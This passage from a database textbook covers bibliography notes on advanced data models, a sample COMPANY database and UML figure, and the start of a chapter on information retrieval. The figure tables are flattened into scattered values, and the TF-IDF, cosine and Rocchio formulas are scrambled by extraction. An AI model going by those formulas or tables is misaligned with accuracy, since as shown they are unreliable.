STARBURST rules are described in Widom and Finkelstein (1990). Early work on
active databases includes the HiPAC project, discussed in Chakravarthy et al. (1989)

987

Enhanced Data Models for Advanced Applications

and Chakravarthy (1990). A glossary for temporal databases is given in Jensen et al.
(1994). Snodgrass (1987) focuses on TQuel, an early temporal query language.

Temporal normalization is defined in Navathe and Ahmed (1989). Paton (1999)
and Paton and Diaz (1999) survey active databases. Chakravarthy et al. (1994)
describe SENTINEL and object-based active systems. Lee et al. (1998) discuss time
series management.

The book by Shekhar and Chawla (2003) consists of all aspects of spatial databases
including spatial data models, spatial storage and indexing, and spatial data mining.
Scholl et al. (2001) is another textbook on spatial data management. Albrecht
(1996) describes in detail the various GIS analysis operations. Clementini and Di
Felice (1993) give a detailed description of the spatial operators. Güting (1994)
describes the spatial data structures and querying languages for spatial database sys-
tems. Guttman (1984) proposed R-trees for spatial data indexing. Manolopoulos et
al. (2005) is a book on the theory and applications of R-trees. Papadias et al. (2003)
discuss query processing using R-trees for spatial networks. Ester et al. (2001) pro-
vide a comprehensive discussion on the algorithms and applications of spatial data
mining. Koperski and Han (1995) discuss association rule discovery from geo-
graphic databases. Brinkhoff et al. (1993) provide a comprehensive overview of the
usage of R-trees for efficient processing of spatial joins. Rotem (1991) describes spa-
tial join indexes comprehensively. Shekhar and Xiong (2008) is a compilation of
various sources that discuss different aspects of spatial database management sys-
tems and GIS. The density-based clustering algorithms DBSCAN and DENCLUE
are proposed by Ester et al. (1996) and Hinnenberg and Gabriel (2007) respectively.

Multimedia database modeling has a vast amount of literature—it is difficult to
point to all important references here. IBM’s QBIC (Query By Image Content) sys-
tem described in Niblack et al. (1998) was one of the first comprehensive approaches
for querying images based on content. It is now available as a part of IBM’s DB2
database image extender. Zhao and Grosky (2002) discuss content-based image
retrieval. Carneiro and Vasconselos (2005) present a database-centric view of seman-
tic image annotation and retrieval. Content-based retrieval of subimages is discussed
by Luo and Nascimento (2004). Tuceryan and Jain (1998) discuss various aspects of
texture analysis. Object recognition using SIFT is discussed in Lowe (2004). Lazebnik
et al. (2004) describe the use of local affine regions to model 3D objects (RIFT).
Among other object recognition approaches, G-RIF is described in Kim et al. (2006),
Bay et al. (2006) discuss SURF, Ke and Sukthankar (2004) present PCA-SIFT, and
Mikolajczyk and Schmid (2005) describe GLOH. Fan et al. (2004) present a tech-
nique for automatic image annotation by using concept-sensitive objects. Fotouhi et
al. (2007) was the first international workshop on many faces of multimedia seman-
tics, which is continuing annually. Thuraisingham (2001) classifies audio data into
different categories, and by treating each of these categories differently, elaborates on
the use of metadata for audio. Prabhakaran (1996) has also discussed how speech
processing techniques can add valuable metadata information to the audio piece.

The early developments of the logic and database approach are surveyed by Gallaire
et al. (1984). Reiter (1984) provides a reconstruction of relational database theory,

988

while Levesque (1984) provides a discussion of incomplete knowledge in light of
logic. Gallaire and Minker (1978) provide an early book on this topic. A detailed
treatment of logic and databases appears in Ullman (1989, Volume 2), and there is a
related chapter in Volume 1 (1988). Ceri, Gottlob, and Tanca (1990) present a com-
prehensive yet concise treatment of logic and databases. Das (1992) is a comprehen-
sive book on deductive databases and logic programming. The early history of
Datalog is covered in Maier and Warren (1988). Clocksin and Mellish (2003) is an
excellent reference on Prolog language.

Aho and Ullman (1979) provide an early algorithm for dealing with recursive
queries, using the least fixed-point operator. Bancilhon and Ramakrishnan (1986)
give an excellent and detailed description of the approaches to recursive query pro-
cessing, with detailed examples of the naive and seminaive approaches. Excellent
survey articles on deductive databases and recursive query processing include
Warren (1992) and Ramakrishnan and Ullman (1995). A complete description of
the seminaive approach based on relational algebra is given in Bancilhon (1985).
Other approaches to recursive query processing include the recursive query/sub-
query strategy of Vieille (1986), which is a top-down interpreted strategy, and the
Henschen-Naqvi (1984) top-down compiled iterative strategy. Balbin and
Ramamohanrao (1987) discuss an extension of the seminaive differential approach
for multiple predicates.

The original paper on magic sets is by Bancilhon et al. (1986). Beeri and
Ramakrishnan (1987) extend it. Mumick et al. (1990a) show the applicability of
magic sets to nonrecursive nested SQL queries. Other approaches to optimizing rules
without rewriting them appear in Vieille (1986, 1987). Kifer and Lozinskii (1986)
propose a different technique. Bry (1990) discusses how the top-down and bottom-
up approaches can be reconciled. Whang and Navathe (1992) describe an extended
disjunctive normal form technique to deal with recursion in relational algebra
expressions for providing an expert system interface over a relational DBMS.

Chang (1981) describes an early system for combining deductive rules with rela-
tional databases. The LDL system prototype is described in Chimenti et al. (1990).
Krishnamurthy and Naqvi (1989) introduce the choice notion in LDL. Zaniolo
(1988) discusses the language issues for the LDL system. A language overview of
CORAL is provided in Ramakrishnan et al. (1992), and the implementation is
described in Ramakrishnan et al. (1993). An extension to support object-oriented
features, called CORAL++, is described in Srivastava et al. (1993). Ullman (1985)
provides the basis for the NAIL! system, which is described in Morris et al. (1987).
Phipps et al. (1991) describe the GLUE-NAIL! deductive database system.

Zaniolo (1990) reviews the theoretical background and the practical importance of
deductive databases. Nicolas (1997) gives an excellent history of the developments
leading up to Deductive Object-Oriented Database (DOOD) systems. Falcone et al.
(1997) survey the DOOD landscape. References on the VALIDITY system include
Friesen et al. (1995), Vieille (1998), and Dietrich et al. (1999).

Enhanced Data Models for Advanced Applications

989

DEPT_LOCATIONS

Dnumber

Houston

Stafford

Bellaire

Sugarland

Dlocation

DEPARTMENT

Dname

Research

Administration

Headquarters 1

5

4

888665555

333445555

987654321

1981-06-19

1988-05-22

1995-01-01

Dnumber Mgr_ssn Mgr_start_date

WORKS_ON

Essn

123456789

123456789

666884444

453453453

453453453

333445555

333445555

333445555

333445555

999887777

999887777

987987987

987987987

987654321

987654321

888665555

3

1

2

2

1

2

30

30

30

10

10

3

10

20

20

20

40.0

32.5

7.5

10.0

10.0

10.0

10.0

20.0

20.0

30.0

5.0

10.0

35.0

20.0

15.0

NULL

Pno Hours

PROJECT

Pname

ProductX

ProductY

ProductZ

Computerization

Reorganization

Newbenefits

3

1

2

30

10

20

5

5

5

4

4

1

Houston

Bellaire

Sugarland

Stafford

Stafford

Houston

Pnumber Plocation Dnum

DEPENDENT

333445555

333445555

333445555

987654321

123456789

123456789

123456789

Joy

Alice F

M

F

M

M

F

F

1986-04-05

1983-10-25

1958-05-03

1942-02-28

1988-01-04

1988-12-30

1967-05-05

Theodore

Alice

Elizabeth

Abner

Michael

Spouse

Daughter

Son

Daughter

Spouse

Spouse

Son

Dependent_name Sex Bdate Relationship

EMPLOYEE

Fname

John

Franklin

Jennifer

Alicia

Ramesh

Joyce

James

Ahmad

Narayan

English

Borg

Jabbar

666884444

453453453

888665555

987987987

F

F

M

M

M

M

M

F

4

4

5

5

4

1

5

5

25000

43000

30000

40000

25000

55000

38000

25000

987654321

888665555

333445555

888665555

987654321

NULL

333445555

333445555

Zelaya

Wallace

Smith

Wong

3321 Castle, Spring, TX

291 Berry, Bellaire, TX

731 Fondren, Houston, TX

638 Voss, Houston, TX

1968-01-19

1941-06-20

1965-01-09

1955-12-08

1969-03-29

1937-11-10

1962-09-15

1972-07-31

980 Dallas, Houston, TX

450 Stone, Houston, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

999887777

987654321

123456789

333445555

Minit Lname Ssn Bdate Address Sex DnoSalary Super_ssn

B

T

J

S

K

A

V

E

Houston

1

4

5

5

Essn

5

Figure A.1
One possible database state for the COMPANY relational database schema.

990

Enhanced Data Models for Advanced Applications

Project

change_project
. . .

RESEARCH_
ASSISTANT

Course

assign_to_course
. . .

TEACHING_
ASSISTANT

Degree_program

change_degree_program
. . .

GRADUATE_
STUDENT

Class

change_classification
. . .

UNDERGRADUATE_
STUDENT

Position

hire_staff
. . .

STAFF

Rank

promote
. . .

FACULTY

Percent_time

hire_student
. . .

STUDENT_ASSISTANT

Year
Degree
Major

DEGREE

. . .

Salary

hire_emp
. . .

EMPLOYEE

new_alumnus
1 *

. . .

ALUMNUS

Major_dept

change_major
. . .

STUDENT

Name
Ssn
Birth_date
Sex
Address

age
. . .

PERSON

Figure A.2
A UML class diagram.

991

Introduction to Information
Retrieval and Web Search1

Information retrieval deals mainly with unstructureddata, and the techniques for indexing, searching, and
retrieving information from large collections of unstructured documents. In this
chapter we will provide an introduction to information retrieval. This is a very
broad topic, so we will focus on the similarities and differences between informa-
tion retrieval and database technologies, and on the indexing techniques that form
the basis of many information retrieval systems.

This chapter is organized as follows. In Section 1 we introduce information retrieval
(IR) concepts and discuss how IR differs from traditional databases. Section 2 is
devoted to a discussion of retrieval models, which form the basis for IR search.
Section 3 covers different types of queries in IR systems. Section 4 discusses text pre-
processing, and Section 5 provides an overview of IR indexing, which is at the heart
of any IR system. In Section 6 we describe the various evaluation metrics for IR sys-
tems performance. Section 7 details Web analysis and its relationship to informa-
tion retrieval, and Section 8 briefly introduces the current trends in IR. Section 9
summarizes the chapter. For a limited overview of IR, we suggest that students read
Sections 1 through 6.

1This chapter is coauthored with Saurav Sahay of the Georgia Institute of Technology.

From Chapter 27 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

992

Introduction to Information Retrieval and Web Search

1 Information Retrieval (IR) Concepts
Information retrieval is the process of retrieving documents from a collection in
response to a query (or a search request) by a user. This section provides an
overview of information retrieval (IR) concepts. In Section 1.1, we introduce infor-
mation retrieval in general and then discuss the different kinds and levels of search
that IR encompasses. In Section 1.2, we compare IR and database technologies.
Section 1.3 gives a brief history of IR. We then present the different modes of user
interaction with IR systems in Section 1.4. In Section 1.5, we describe the typical IR
process with a detailed set of tasks and then with a simplified process flow, and end
with a brief discussion of digital libraries and the Web.

1.1 Introduction to Information Retrieval
We first review the distinction between structured and unstructured data to see how
information retrieval differs from structured data management. Consider a relation
(or table) called HOUSES with the attributes:

HOUSES(Lot#, Address, Square_footage, Listed_price)

This is an example of structured data. We can compare this relation with home-
buying contract documents, which are examples of unstructured data. These types
of documents can vary from city to city, and even county to county, within a given
state in the United States. Typically, a contract document in a particular state will
have a standard list of clauses described in paragraphs within sections of the docu-
ment, with some predetermined (fixed) text and some variable areas whose content
is to be supplied by the specific buyer and seller. Other variable information would
include interest rate for financing, down-payment amount, closing dates, and so on.
The documents could also possibly include some pictures taken during a home
inspection. The information content in such documents can be considered
unstructured data that can be stored in a variety of possible arrangements and for-
mats. By unstructured information, we generally mean information that does not
have a well-defined formal model and corresponding formal language for represen-
tation and reasoning, but rather is based on understanding of natural language.

With the advent of the World Wide Web (or Web, for short), the volume of unstruc-
tured information stored in messages and documents that contain textual and mul-
timedia information has exploded. These documents are stored in a variety of
standard formats, including HTML, XML, and several audio and video formatting
standards. Information retrieval deals with the problems of storing, indexing, and
retrieving (searching) such information to satisfy the needs of users. The problems
that IR deals with are exacerbated by the fact that the number of Web pages and the
number of social interaction events is already in the billions, and is growing at a
phenomenal rate. All forms of unstructured data described above are being added at
the rates of millions per day, expanding the searchable space on the Web at rapidly
increasing rates.

993

Introduction to Information Retrieval and Web Search

Historically, information retrieval is “the discipline that deals with the structure,
analysis, organization, storage, searching, and retrieval of information” as defined
by Gerald Salton, an IR pioneer.2 We can enhance the definition slightly to say that
it applies in the context of unstructured documents to satisfy a user’s information
needs. This field has existed even longer than the database field, and was originally
concerned with retrieval of cataloged information in libraries based on titles,
authors, topics, and keywords. In academic programs, the field of IR has long been a
part of Library and Information Science programs. Information in the context of IR
does not require machine-understandable structures, such as in relational database
systems. Examples of such information include written texts, abstracts, documents,
books, Web pages, e-mails, instant messages, and collections from digital libraries.
Therefore, all loosely represented (unstructured) or semistructured information is
also part of the IR discipline.

RDBMS (relational database management system) vendors are providing modules
to support data types, including spatial, temporal, and multimedia data, as well as
XML data, in the newer versions of their products, sometimes referred to as
extended RDBMSs, or object-relational database management systems (ORDBMSs).
The challenge of dealing with unstructured data is largely an information retrieval
problem, although database researchers have been applying database indexing and
search techniques to some of these problems.

IR systems go beyond database systems in that they do not limit the user to a spe-
cific query language, nor do they expect the user to know the structure (schema) or
content of a particular database. IR systems use a user’s information need expressed
as a free-form search request (sometimes called a keyword search query, or just
query) for interpretation by the system. Whereas the IR field historically dealt with
cataloging, processing, and accessing text in the form of documents for decades, in
today’s world the use of Web search engines is becoming the dominant way to find
information. The traditional problems of text indexing and making collections of
documents searchable have been transformed by making the Web itself into a
quickly accessible repository of human knowledge.

An IR system can be characterized at different levels: by types of users, types of data,
and the types of the information need, along with the size and scale of the informa-
tion repository it addresses. Different IR systems are designed to address specific
problems that require a combination of different characteristics. These characteris-
tics can be briefly described as follows:

Types of Users. The user may be an expert user (for example, a curator or a
librarian), who is searching for specific information that is clear in his/her mind
and forms relevant queries for the task, or a layperson user with a generic infor-
mation need. The latter cannot create highly relevant queries for search (for

2See Salton’s 1968 book entitled Automatic Information Organization and Retrieval.

994

Introduction to Information Retrieval and Web Search

example, students trying to find information about a new topic, researchers try-
ing to assimilate different points of view about a historical issue, a scientist ver-
ifying a claim by another scientist, or a person trying to shop for clothing).

Types of Data. Search systems can be tailored to specific types of data. For
example, the problem of retrieving information about a specific topic may be
handled more efficiently by customized search systems that are built to collect
and retrieve only information related to that specific topic. The information
repository could be hierarchically organized based on a concept or topic hierar-
chy. These topical domain-specific or vertical IR systems are not as large as or as
diverse as the generic World Wide Web, which contains information on all
kinds of topics. Given that these domain-specific collections exist and may have
been acquired through a specific process, they can be exploited much more effi-
ciently by a specialized system.

Types of Information Need. In the context of Web search, users’ information
needs may be defined as navigational, informational, or transactional.3

Navigational search refers to finding a particular piece of information (such as
the Georgia Tech University Website) that a user needs quickly. The purpose of
informational search is to find current information about a topic (such as
research activities in the college of computing at Georgia Tech—this is the clas-
sic IR system task). The goal of transactional search is to reach a site where fur-
ther interaction happens (such as joining a social network, product shopping,
online reservations, accessing databases, and so on).

Levels of Scale. In the words of Nobel Laureate Herbert Simon,

What information consumes is rather obvious: it consumes the attention of its
recipients. Hence a wealth of information creates a poverty of attention, and a need
to allocate that attention efficiently among the overabundance of information
sources that might consume it. 4

This overabundance of information sources in effect creates a high noise-to-signal
ratio in IR systems. Especially on the Web, where billions of pages are indexed, IR
interfaces are built with efficient scalable algorithms for distributed searching,
indexing, caching, merging, and fault tolerance. IR search engines can be limited in
level to more specific collections of documents. Enterprise search systems offer IR
solutions for searching different entities in an enterprise’s intranet, which consists
of the network of computers within that enterprise. The searchable entities include
e-mails, corporate documents, manuals, charts, and presentations, as well as reports
related to people, meetings, and projects. They still typically deal with hundreds of
millions of entities in large global enterprises. On a smaller scale, there are personal
information systems such as those on desktops and laptops, called desktop search
engines (for example, Google Desktop), for retrieving files, folders, and different
kinds of entities stored on the computer. There are peer-to-peer systems, such as

3See Broder (2002) for details.
4From Simon (1971), “Designing Organizations for an Information-Rich World.”

995

Introduction to Information Retrieval and Web Search

BitTorrent, which allows sharing of music in the form of audio files, as well as spe-
cialized search engines for audio, such as Lycos and Yahoo! audio search.

1.2 Databases and IR Systems: A Comparison
Within the computer science discipline, databases and IR systems are closely related
fields. Databases deal with structured information retrieval through well-defined
formal languages for representation and manipulation based on the theoretically
founded data models. Efficient algorithms have been developed for operators that
allow rapid execution of complex queries. IR, on the other hand, deals with unstruc-
tured search with possibly vague query or search semantics and without a well-
defined logical schematic representation. Some of the key differences between
databases and IR systems are listed in Table 1.

Whereas databases have fixed schemas defined in some data model such as the rela-
tional model, an IR system has no fixed data model; it views data or documents
according to some scheme, such as the vector space model, to aid in query process-
ing (see Section 2). Databases using the relational model employ SQL for queries
and transactions. The queries are mapped into relational algebra operations and
search algorithms and return a new relation (table) as the query result, providing an
exact answer to the query for the current state of the database. In IR systems, there
is no fixed language for defining the structure (schema) of the document or for
operating on the document—queries tend to be a set of query terms (keywords) or
a free-form natural language phrase. An IR query result is a list of document ids, or
some pieces of text or multimedia objects (images, videos, and so on), or a list of
links to Web pages.

The result of a database query is an exact answer; if no matching records (tuples) are
found in the relation, the result is empty (null). On the other hand, the answer to a
user request in an IR query represents the IR system’s best attempt at retrieving the

Table 1 A Comparison of Databases and IR Systems

Databases

■ Structured data
■ Schema driven
■ Relational (or object, hierarchical, and

network) model is predominant
■ Structured query model
■ Rich metadata operations
■ Query returns data
■ Results are based on exact matching (always

correct)

IR Systems
■ Unstructured data
■ No fixed schema; various data models

(e.g., vector space model)
■ Free-form query models
■ Rich data operations
■ Search request returns list or pointers to

documents
■ Results are based on approximate matching

and measures of effectiveness (may be
imprecise and ranked)

996

Introduction to Information Retrieval and Web Search

information most relevant to that query. Whereas database systems maintain a large
amount of metadata and allow their use in query optimization, the operations in IR
systems rely on the data values themselves and their occurrence frequencies.
Complex statistical analysis is sometimes performed to determine the relevance of
each document or parts of a document to the user request.

1.3 A Brief History of IR
Information retrieval has been a common task since the times of ancient civiliza-
tions, which devised ways to organize, store, and catalog documents and records.
Media such as papyrus scrolls and stone tablets were used to record documented
information in ancient times. These efforts allowed knowledge to be retained and
transferred among generations. With the emergence of public libraries and the
printing press, large-scale methods for producing, collecting, archiving, and distrib-
uting documents and books evolved. As computers and automatic storage systems
emerged, the need to apply these methods to computerized systems arose. Several
techniques emerged in the 1950s, such as the seminal work of H. P. Luhn,5 who pro-
posed using words and their frequency counts as indexing units for documents, and
using measures of word overlap between queries and documents as the retrieval cri-
terion. It was soon realized that storing large amounts of text was not difficult. The
harder task was to search for and retrieve that information selectively for users with
specific information needs. Methods that explored word distribution statistics gave
rise to the choice of keywords based on their distribution properties6 and keyword-
based weighting schemes.

The earlier experiments with document retrieval systems such as SMART7 in the
1960s adopted the inverted file organization based on keywords and their weights as
the method of indexing (see Section 5). Serial (or sequential) organization proved
inadequate if queries required fast, near real-time response times. Proper organiza-
tion of these files became an important area of study; document classification and
clustering schemes ensued. The scale of retrieval experiments remained a challenge
due to lack of availability of large text collections. This soon changed with the World
Wide Web. Also, the Text Retrieval Conference (TREC) was launched by NIST
(National Institute of Standards and Technology) in 1992 as a part of the TIPSTER
program8 with the goal of providing a platform for evaluating information retrieval
methodologies and facilitating technology transfer to develop IR products.

A search engine is a practical application of information retrieval to large-scale
document collections. With significant advances in computers and communica-
tions technologies, people today have interactive access to enormous amounts of
user-generated distributed content on the Web. This has spurred the rapid growth

5See Luhn (1957) “A statistical approach to mechanized encoding and searching of literary information.”
6See Salton, Yang, and Yu (1975).
7For details, see Buckley et al. (1993).
8For details, see Harman (1992).

997

in search engine technology, where search engines are trying to discover different
kinds of real-time content found on the Web. The part of a search engine responsi-
ble for discovering, analyzing, and indexing these new documents is known as a
crawler. Other types of search engines exist for specific domains of knowledge. For
example, the biomedical literature search database was started in the 1970s and is
now supported by the PubMed search engine,9 which gives access to over 20 million
abstracts.

While continuous progress is being made to tailor search results to the needs of an
end user, the challenge remains in providing high-quality, pertinent, and timely
information that is precisely aligned to the information needs of individual users.

1.4 Modes of Interaction in IR Systems
In the beginning of Section 1, we defined information retrieval as the process of
retrieving documents from a collection in response to a query (or a search request)
by a user. Typically the collection is made up of documents containing unstructured
data. Other kinds of documents include images, audio recordings, video strips, and
maps. Data may be scattered nonuniformly in these documents with no definitive
structure. A query is a set of terms (also referred to as keywords) used by the
searcher to specify an information need (for example, the terms ‘databases’ and
‘operating systems’ may be regarded as a query to a computer science bibliographic
database). An informational request or a search query may also be a natural lan-
guage phrase or a question (for example, “What is the currency of China?” or “Find
Italian restaurants in Sarasota, Florida.”).

There are two main modes of interaction with IR systems—retrieval and brows-
ing—which, although similar in goal, are accomplished through different interac-
tion tasks. Retrieval is concerned with the extraction of relevant information from
a repository of documents through an IR query, while browsing signifies the activ-
ity of a user visiting or navigating through similar or related documents based on
the user’s assessment of relevance. During browsing, a user’s information need may
not be defined a priori and is flexible. Consider the following browsing scenario: A
user specifies ‘Atlanta’ as a keyword. The information retrieval system retrieves links
to relevant result documents containing various aspects of Atlanta for the user. The
user comes across the term ‘Georgia Tech’ in one of the returned documents, and
uses some access technique (such as clicking on the phrase ‘Georgia Tech’ in a docu-
ment, which has a built-in link) and visits documents about Georgia Tech in the
same or a different Website (repository). There the user finds an entry for ‘Athletics’
that leads the user to information about various athletic programs at Georgia Tech.
Eventually, the user ends his search at the Fall schedule for the Yellow Jackets foot-
ball team, which he finds to be of great interest. This user activity is known as
browsing. Hyperlinks are used to interconnect Web pages and are mainly used for
browsing. Anchor texts are text phrases within documents used to label hyperlinks
and are very relevant to browsing.

Introduction to Information Retrieval and Web Search

9See www.ncbi.nlm.nih.gov/pubmed/.

998

Introduction to Information Retrieval and Web Search

Web search combines both aspects—browsing and retrieval—and is one of the
main applications of information retrieval today. Web pages are analogous to docu-
ments. Web search engines maintain an indexed repository of Web pages, usually
using the technique of inverted indexing (see Section 5). They retrieve the most rel-
evant Web pages for the user in response to the user’s search request with a possible
ranking in descending order of relevance. The rank of a Webpage in a retrieved set
is the measure of its relevance to the query that generated the result set.

1.5 Generic IR Pipeline
As we mentioned earlier, documents are made up of unstructured natural language
text composed of character strings from English and other languages. Common
examples of documents include newswire services (such as AP or Reuters), corpo-
rate manuals and reports, government notices, Web page articles, blogs, tweets,
books, and journal papers. There are two main approaches to IR: statistical and
semantic.

In a statistical approach, documents are analyzed and broken down into chunks of
text (words, phrases, or n-grams, which are all subsequences of length n characters
in a text or document) and each word or phrase is counted, weighted, and measured
for relevance or importance. These words and their properties are then compared
with the query terms for potential degree of match to produce a ranked list of
resulting documents that contain the words. Statistical approaches are further clas-
sified based on the method employed. The three main statistical approaches are
Boolean, vector space, and probabilistic (see Section 2).

Semantic approaches to IR use knowledge-based techniques of retrieval that
broadly rely on the syntactic, lexical, sentential, discourse-based, and pragmatic lev-
els of knowledge understanding. In practice, semantic approaches also apply some
form of statistical analysis to improve the retrieval process.

Figure 1 shows the various stages involved in an IR processing system. The steps
shown on the left in Figure 1 are typically offline processes, which prepare a set of
documents for efficient retrieval; these are document preprocessing, document
modeling, and indexing. The steps involved in query formation, query processing,
searching mechanism, document retrieval, and relevance feedback are shown on the
right in Figure 1. In each box, we highlight the important concepts and issues. The
rest of this chapter describes some of the concepts involved in the various tasks
within the IR process shown in Figure 1.

Figure 2 shows a simplified IR processing pipeline. In order to perform retrieval on
documents, the documents are first represented in a form suitable for retrieval. The
significant terms and their properties are extracted from the documents and are
represented in a document index where the words/terms and their properties are
stored in a matrix that contains these terms and the references to the documents
that contain them. This index is then converted into an inverted index (see Figure 4)
of a word/term vs. document matrix. Given the query words, the documents con-

999

Introduction to Information Retrieval and Web Search

Document 3
Document 2

Document 1
Document Corpus

Preprocessing

Modeling

Indexing

Stopword removal
Stemming
Thesaurus
Digits, hyphens,
punctuation marks, cases
Information extraction

Retrieval models
Type of queries

Inverted index construction
Index vocabulary
Document statistics
Index maintenance

SEARCH INTENT
Information

Need/Search

Query Formation

Query Processing

Searching
Mechanism

Relevance
Feedback

Legend
Dashed line indicates

next iteration

Choice of search strategy
(approximate vs. exact matches,
exhaustive vs. top K)
Type of similarity measure

Keywords, Boolean, phrase,
proximity, wildcard queries, etc.

Conversion from humanly
understandable to internal format
Situation assessment
Query expansion heuristics
(users’s profile, related metadata,
etc.)

Storing user’s
feedback
Personalization
Pattern analysis
of relevant
results

Metadata
Integration

Ranking results
Showing useful
metadata

External data
ontologies

Document
Retrieval

Figure 1
Generic IR framework.

taining these words—and the document properties, such as date of creation, author,
and type of document—are fetched from the inverted index and compared with the
query. This comparison results in a ranked list shown to the user. The user can then
provide feedback on the results that triggers implicit or explicit query expansion to
fetch results that are more relevant for the user. Most IR systems allow for an inter-
active search where the query and the results are successively refined.

2 Retrieval Models
In this section we briefly describe the important models of IR. These are the three
main statistical models—Boolean, vector space, and probabilistic—and the seman-
tic model.

1000

Introduction to Information Retrieval and Web Search

Documents

EXTRACT

FEEDBACK
QUERY

FETCH

PROCESS

Inverted Index

COMPARE
Query x

Documents

RANK

Two tickets tickled slightly angst-riden

orifices. Two Jabberwockies sacrificed subways,

and two mosly bourgeois orifices towed Kermit.

Five very progressive fountains annoyingly

tickled the partly speedy dog, even though

two putrid sheep laughed almost noisily.

Document #4
Two tickets tickled slightly angst-riden

orifices. Two Jabberwockies sacrificed subways,

and two mosly bourgeois orifices towed Kermit.

Five very progressive fountains annoyingly

tickled the partly speedy dog, even though

two putrid sheep laughed almost noisily.

Document #3
Two tickets tickled slightly angst-riden

orifices. Two Jabberwockies sacrificed subways,

and two mosly bourgeois orifices towed Kermit.

Five very progressive fountains annoyingly

tickled the partly speedy dog, even though

two putrid sheep laughed almost noisily.

Document #2
Two tickets tickled slightly angst-riden

orifices. Two Jabberwockies sacrificed subways,

and two mosly bourgeois orifices towed Kermit.

Five very progressive fountains annoyingly

tickled the partly speedy dog, even though

two putrid sheep laughed almost noisily.

Document #1

Result #3
Two tickets tickled slightly angst-riden

orifices. Two Jabberwockies sacrificed subways,

and two mosly bourgeois orifices towed Kermit.

Five very progressive fountains annoyingly

tickled the partly speedy dog, even though

two putrid sheep laughed almost noisily.

Result #2
Two tickets tickled slightly angst-riden

orifices. Two Jabberwockies sacrificed subways,

and two mosly bourgeois orifices towed Kermit.

Five very progressive fountains annoyingly

tickled the partly speedy dog, even though

two putrid sheep laughed almost noisily.

Result #1

Index

D1 1 1 0 1 1 0…
D2 1 1 1 0 1 1…
D3 1 1 0 1 1 1…
D4 0 1 0 0 1 0…
D5 0 0 0 1 0 1…
D6 1 0 1 0 0 0…

W1 1 1 1 0 0 1…
W2 1 1 1 1 0 0…
W3 0 1 0 0 0 1…
W4 1 0 1 0 1 0…
W5 1 1 1 1 0 0…
W6 0 1 1 0 1 0…

SEARCH INTENT

Figure 2
Simplified IR process pipeline.

2.1 Boolean Model
In this model, documents are represented as a set of terms. Queries are formulated
as a combination of terms using the standard Boolean logic set-theoretic operators
such as AND, OR and NOT. Retrieval and relevance are considered as binary concepts
in this model, so the retrieved elements are an “exact match” retrieval of relevant
documents. There is no notion of ranking of resulting documents. All retrieved
documents are considered equally important—a major simplification that does not
consider frequencies of document terms or their proximity to other terms com-
pared against the query terms.

Boolean retrieval models lack sophisticated ranking algorithms and are among the
earliest and simplest information retrieval models. These models make it easy to
associate metadata information and write queries that match the contents of the

1001

Introduction to Information Retrieval and Web Search

documents as well as other properties of documents, such as date of creation,
author, and type of document.

2.2 Vector Space Model
The vector space model provides a framework in which term weighting, ranking of
retrieved documents, and relevance feedback are possible. Documents are repre-
sented as features and weights of term features in an n-dimensional vector space of
terms. Features are a subset of the terms in a set of documents that are deemed most
relevant to an IR search for this particular set of documents. The process of select-
ing these important terms (features) and their properties as a sparse (limited) list
out of the very large number of available terms (the vocabulary can contain hun-
dreds of thousands of terms) is independent of the model specification. The query
is also specified as a terms vector (vector of features), and this is compared to the
document vectors for similarity/relevance assessment.

The similarity assessment function that compares two vectors is not inherent to the
model—different similarity functions can be used. However, the cosine of the angle
between the query and document vector is a commonly used function for similarity
assessment. As the angle between the vectors decreases, the cosine of the angle
approaches one, meaning that the similarity of the query with a document vector
increases. Terms (features) are weighted proportional to their frequency counts to
reflect the importance of terms in the calculation of relevance measure. This is dif-
ferent from the Boolean model, which does not take into account the frequency of
words in the document for relevance match.

In the vector model, the document term weight wij (for term i in document j) is repre-
sented based on some variation of the TF (term frequency) or TF-IDF (term
frequency-inverse document frequency) scheme (as we will describe below). TF-IDF
is a statistical weight measure that is used to evaluate the importance of a document
word in a collection of documents. The following formula is typically used:

In the formula given above, we use the following symbols:

■ dj is the document vector.

■ q is the query vector.

■ wij is the weight of term i in document j.

■ wiq is the weight of term i in query vector q.

■ |V| is the number of dimensions in the vector that is the total number of
important keywords (or features).

TF-IDF uses the product of normalized frequency of a term i (TFij) in document Dj
and the inverse document frequency of the term i (IDFi) to weight a term in a

cosine( , )
|| || || ||

| |

d q
d q

d q

w w
j

j

j

ij iqi

V

=
×

×
=

×
=1∑∑

∑ ∑= =×w wiji
V

iqi

V2
1

2
1

| | | |

1002

Introduction to Information Retrieval and Web Search

document. The idea is that terms that capture the essence of a document occur fre-
quently in the document (that is, their TF is high), but if such a term were to be a
good term that discriminates the document from others, it must occur in only a few
documents in the general population (that is, its IDF should be high as well).

IDF values can be easily computed for a fixed collection of documents. In case of
Web search engines, taking a representative sample of documents approximates IDF
computation. The following formulas can be used:

In these formulas, the meaning of the symbols is:

■ TFij is the normalized term frequency of term i in document Dj.
■ fij is the number of occurrences of term i in document Dj.
■ IDFi is the inverse document frequency weight for term i.
■ N is the number of documents in the collection.
■ ni is the number of documents in which term i occurs.

Note that if a term i occurs in all documents, then ni = N and hence IDFi = log (1)
becomes zero, nullifying its importance and creating a situation where division by
zero can occur. The weight of term i in document j, wij is computed based on its TF-
IDF value in some techniques. To prevent division by zero, it is common to add a 1
to the denominator in the formulae such as the cosine formula above.

Sometimes, the relevance of the document with respect to a query (rel(Dj,Q)) is
directly measured as the sum of the TF-IDF values of the terms in the Query Q:

The normalization factor (similar to the denominator of the cosine formula) is
incorporated into the TF-IDF formula itself, thereby measuring relevance of a doc-
ument to the query by the computation of the dot product of the query and docu-
ment vectors.

The Rocchio10 algorithm is a well-known relevance feedback algorithm based on
the vector space model that modifies the initial query vector and its weights in
response to user-identified relevant documents. It expands the original query vector
q to a new vector qe as follows:

q q
D

d
D

de
r

r
ird D

ir
d D

r r ir ir

= + −
∈ ∈
∑ ∑α β γ

| | | |

rel( , )D Q TF IDFj i Q ij i= ×∑ ∈

TF f f

IDF N n

ij ij ij
i V

i i

=

= ( )
=

1 to | |

log /

10See Rocchio (1971).

1003

Introduction to Information Retrieval and Web Search

Here, Dr and Dir are relevant and nonrelevant document sets and α, β, and γ are
parameters of the equation. The values of these parameters determine how the feed-
back affects the original query, and these may be determined after a number of trial-
and-error experiments.

2.3 Probabilistic Model
The similarity measures in the vector space model are somewhat ad hoc. For exam-
ple, the model assumes that those documents closer to the query in cosine space are
